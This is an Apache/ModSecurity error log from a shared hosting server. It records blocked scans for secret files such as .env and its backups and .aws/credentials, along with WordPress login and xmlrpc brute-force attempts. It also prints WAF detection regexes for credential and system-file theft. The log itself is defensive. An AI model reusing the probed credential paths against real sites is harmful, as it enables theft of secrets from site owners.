[Tue May 26 13:05:10.545757 2026] [security2:error] [pid 485064:tid 485066] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-blog.php"] [unique_id "ahVNLj9tlF55stOmSqEHWAAArwE"]
[Tue May 26 13:05:10.726303 2026] [security2:error] [pid 485064:tid 485121] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp.php"] [unique_id "ahVNLj9tlF55stOmSqEHXwAAmjg"]
[Tue May 26 13:05:10.921081 2026] [security2:error] [pid 485064:tid 485108] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/worksec.php"] [unique_id "ahVNLj9tlF55stOmSqEHYwAA4ys"]
[Tue May 26 13:05:11.093898 2026] [security2:error] [pid 485064:tid 485127] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-themes.php"] [unique_id "ahVNLz9tlF55stOmSqEHagAA3D4"]
[Tue May 26 13:05:11.265211 2026] [security2:error] [pid 485064:tid 485117] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-signin.php"] [unique_id "ahVNLz9tlF55stOmSqEHbgAA5zQ"]
[Tue May 26 13:05:11.437152 2026] [security2:error] [pid 485064:tid 485103] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-blog-header.php"] [unique_id "ahVNLz9tlF55stOmSqEHdQAA4iY"]
[Tue May 26 13:05:11.772926 2026] [security2:error] [pid 485064:tid 485219] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHOgAAnhg"], referer: http://kingsclub.in/.env-config.js
[Tue May 26 13:05:11.787847 2026] [security2:error] [pid 485064:tid 485172] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHPQAApWs"], referer: http://kingsclub.in/.env.js
[Tue May 26 13:05:11.835410 2026] [security2:error] [pid 485064:tid 485123] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ws.php"] [unique_id "ahVNLz9tlF55stOmSqEHkgAA6To"]
[Tue May 26 13:05:11.870704 2026] [security2:error] [pid 485064:tid 485067] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHQgAAiAI"], referer: http://kingsclub.in/config.json
[Tue May 26 13:05:11.922171 2026] [security2:error] [pid 485064:tid 485169] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHRwAAo2g"], referer: http://kingsclub.in/settings.py
[Tue May 26 13:05:11.933239 2026] [security2:error] [pid 485064:tid 485229] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHQwAAqAs"], referer: http://kingsclub.in/app/config/parameters.yml
[Tue May 26 13:05:11.991020 2026] [security2:error] [pid 485064:tid 485085] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHSAAApxQ"], referer: http://kingsclub.in/config/application.yml
[Tue May 26 13:05:12.007771 2026] [security2:error] [pid 485064:tid 485110] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wsa.php"] [unique_id "ahVNMD9tlF55stOmSqEHlwAA0C0"]
[Tue May 26 13:05:12.036855 2026] [security2:error] [pid 485064:tid 485265] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHSQAAzCA"], referer: http://kingsclub.in/config/parameters.yml
[Tue May 26 13:05:12.180039 2026] [security2:error] [pid 485064:tid 485115] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/w.php"] [unique_id "ahVNMD9tlF55stOmSqEHpQAAjzI"]
[Tue May 26 13:05:12.363096 2026] [security2:error] [pid 485064:tid 485111] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/x.php"] [unique_id "ahVNMD9tlF55stOmSqEHsAAA8i4"]
[Tue May 26 13:05:12.534984 2026] [security2:error] [pid 485064:tid 485116] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/xx.php"] [unique_id "ahVNMD9tlF55stOmSqEHvQAA7jM"]
[Tue May 26 13:05:12.575250 2026] [security2:error] [pid 485064:tid 485069] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHOAAAigQ"], referer: http://kingsclub.in/.aws/credentials
[Tue May 26 13:05:12.604729 2026] [security2:error] [pid 485064:tid 485313] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNMD9tlF55stOmSqEHoQAAAPw"]
[Tue May 26 13:05:12.950878 2026] [security2:error] [pid 485064:tid 485113] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/xmlrpc.php"] [unique_id "ahVNMD9tlF55stOmSqEHxAAAtTA"]
[Tue May 26 13:05:13.123048 2026] [security2:error] [pid 485064:tid 485098] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/y.php"] [unique_id "ahVNMT9tlF55stOmSqEH0wAAhyE"]
[Tue May 26 13:05:14.565594 2026] [security2:error] [pid 485064:tid 485287] [client 52.167.144.221:40506] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVNMT9tlF55stOmSqEH6wAA4l4"]
[Tue May 26 13:05:14.758047 2026] [security2:error] [pid 485064:tid 485284] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNMj9tlF55stOmSqEIDAAAAN8"]
[Tue May 26 13:05:15.750085 2026] [security2:error] [pid 485064:tid 485250] [client 37.46.113.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNMz9tlF55stOmSqEINAAAAL0"]
[Tue May 26 13:05:16.639104 2026] [security2:error] [pid 485064:tid 485282] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNND9tlF55stOmSqEIXwAAAN0"]
[Tue May 26 13:05:18.606229 2026] [security2:error] [pid 485064:tid 485209] [client 157.20.138.61:49767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNNj9tlF55stOmSqEIxQAAAJQ"]
[Tue May 26 13:05:18.606373 2026] [security2:error] [pid 485064:tid 485209] [client 157.20.138.61:49767] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNNj9tlF55stOmSqEIxQAAAJQ"]
[Tue May 26 13:05:19.517189 2026] [security2:error] [pid 485064:tid 485241] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNNz9tlF55stOmSqEI3gAAALQ"]
[Tue May 26 13:05:21.253440 2026] [security2:error] [pid 485064:tid 485243] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNOD9tlF55stOmSqEJHQAAALY"]
[Tue May 26 13:05:22.301964 2026] [security2:error] [pid 485064:tid 485090] [remote 5.250.187.247:53500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVNOj9tlF55stOmSqEJSQAAihk"]
[Tue May 26 13:05:24.096047 2026] [security2:error] [pid 485064:tid 485273] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNOz9tlF55stOmSqEJhQAAANQ"]
[Tue May 26 13:05:25.641966 2026] [security2:error] [pid 485064:tid 485067] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env"] [unique_id "ahVNPT9tlF55stOmSqEJ1QAA7wI"]
[Tue May 26 13:05:26.666344 2026] [security2:error] [pid 485064:tid 485224] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNPj9tlF55stOmSqEJ7wAAAKM"]
[Tue May 26 13:05:27.025534 2026] [security2:error] [pid 485064:tid 485083] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.backup"] [unique_id "ahVNPz9tlF55stOmSqEKFgAA5BI"]
[Tue May 26 13:05:27.207736 2026] [security2:error] [pid 485064:tid 485111] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.old"] [unique_id "ahVNPz9tlF55stOmSqEKFwAAnC4"]
[Tue May 26 13:05:27.391067 2026] [security2:error] [pid 485064:tid 485101] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.bak"] [unique_id "ahVNPz9tlF55stOmSqEKGAAAoiQ"]
[Tue May 26 13:05:27.765091 2026] [security2:error] [pid 485064:tid 485069] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.orig"] [unique_id "ahVNPz9tlF55stOmSqEKKAABAgQ"]
[Tue May 26 13:05:27.947840 2026] [security2:error] [pid 485064:tid 485114] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.copy"] [unique_id "ahVNPz9tlF55stOmSqEKLAAA3jE"]
[Tue May 26 13:05:29.032675 2026] [security2:error] [pid 485064:tid 485248] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNQD9tlF55stOmSqEKSgAAALs"]
[Tue May 26 13:05:29.095688 2026] [security2:error] [pid 485064:tid 485243] [client 157.20.138.61:50092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNQT9tlF55stOmSqEKWgAAALY"]
[Tue May 26 13:05:29.095804 2026] [security2:error] [pid 485064:tid 485243] [client 157.20.138.61:50092] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNQT9tlF55stOmSqEKWgAAALY"]
[Tue May 26 13:05:29.996219 2026] [security2:error] [pid 485064:tid 485146] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.swp"] [unique_id "ahVNQT9tlF55stOmSqEKfwAA4VE"]
[Tue May 26 13:05:30.178248 2026] [security2:error] [pid 485064:tid 485144] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env.swo"] [unique_id "ahVNQj9tlF55stOmSqEKgwAA8E8"]
[Tue May 26 13:05:30.360760 2026] [security2:error] [pid 485064:tid 485160] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.env~"] [unique_id "ahVNQj9tlF55stOmSqEKjgAAo18"]
[Tue May 26 13:05:31.495395 2026] [security2:error] [pid 485064:tid 485308] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNQz9tlF55stOmSqEKpQAAAPc"]
[Tue May 26 13:05:31.498045 2026] [security2:error] [pid 485064:tid 485143] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/env.php"] [unique_id "ahVNQz9tlF55stOmSqEKugAA4k4"]
[Tue May 26 13:05:31.717084 2026] [security2:error] [pid 485064:tid 485278] [client 40.82.218.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVNQz9tlF55stOmSqEKxgAAANk"]
[Tue May 26 13:05:32.261389 2026] [security2:error] [pid 485064:tid 485192] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/env.bak"] [unique_id "ahVNRD9tlF55stOmSqEK4QAA2n8"]
[Tue May 26 13:05:32.444491 2026] [security2:error] [pid 485064:tid 485186] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/env.old"] [unique_id "ahVNRD9tlF55stOmSqEK5AAAtXk"]
[Tue May 26 13:05:33.159700 2026] [security2:error] [pid 485064:tid 485321] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNRD9tlF55stOmSqEK8AAAAQQ"]
[Tue May 26 13:05:34.686266 2026] [security2:error] [pid 485064:tid 485182] [remote 160.250.186.220:40544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVNRj9tlF55stOmSqELQgAAqXU"]
[Tue May 26 13:05:36.181962 2026] [security2:error] [pid 485064:tid 485280] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNRz9tlF55stOmSqELfQAAANs"]
[Tue May 26 13:05:36.232937 2026] [security2:error] [pid 485064:tid 485292] [client 82.21.231.153:51613] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVNRz9tlF55stOmSqELewAAAOc"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 13:05:38.487173 2026] [security2:error] [pid 485064:tid 485277] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNSj9tlF55stOmSqEL2wAAANg"]
[Tue May 26 13:05:39.518846 2026] [security2:error] [pid 485064:tid 485196] [client 140.213.148.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNSz9tlF55stOmSqEMDAAAAIc"]
[Tue May 26 13:05:39.623926 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:50368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNSz9tlF55stOmSqEMHwAAANY"]
[Tue May 26 13:05:39.624099 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:50368] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNSz9tlF55stOmSqEMHwAAANY"]
[Tue May 26 13:05:40.370454 2026] [security2:error] [pid 485064:tid 485239] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNSz9tlF55stOmSqEMMgAAALI"]
[Tue May 26 13:05:41.298274 2026] [access_compat:error] [pid 485064:tid 485242] [client 185.177.72.30:0] AH01797: client denied by server configuration: /home2/samayikp/public_html/.htaccess
[Tue May 26 13:05:41.490580 2026] [authz_core:error] [pid 485064:tid 485262] [client 185.177.72.30:0] AH01630: client denied by server configuration: /home2/samayikp/public_html/.htpasswd
[Tue May 26 13:05:41.673878 2026] [security2:error] [pid 485064:tid 485088] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htaccess.bak"] [unique_id "ahVNTT9tlF55stOmSqEMdQAA2Rc"]
